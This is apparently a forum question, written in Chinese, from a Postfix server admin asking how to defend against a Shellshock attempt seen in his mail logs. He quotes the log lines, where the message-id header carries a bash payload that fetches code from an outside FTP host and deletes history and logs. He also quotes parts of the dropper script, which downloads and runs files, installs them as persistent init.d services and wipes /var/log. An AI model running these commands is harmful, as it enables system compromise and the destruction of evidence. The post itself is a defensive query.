昨天我收到一封从我的邮件服务器发送至 {@DOMAIN.ORG 的电子邮件,该邮件被标记为垃圾邮件。
正文包括脚本下载命令,例如ftp://ftp.ugotownz.org/upfile2.sh
来自系统日志的行
Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*"
事实上,这个非常简单的未加密的 shell 脚本试图建立一个木马。在我看来,它看起来相当肮脏,而且没有成功。
但无论如何,我能做些什么来防范postfix
这些类型的黑客攻击?
从剧本来看
...
echo sshdo.ico >> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done
...
for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done
...
chattr +i /tmp/.udp/*
rm -rf /var/log/*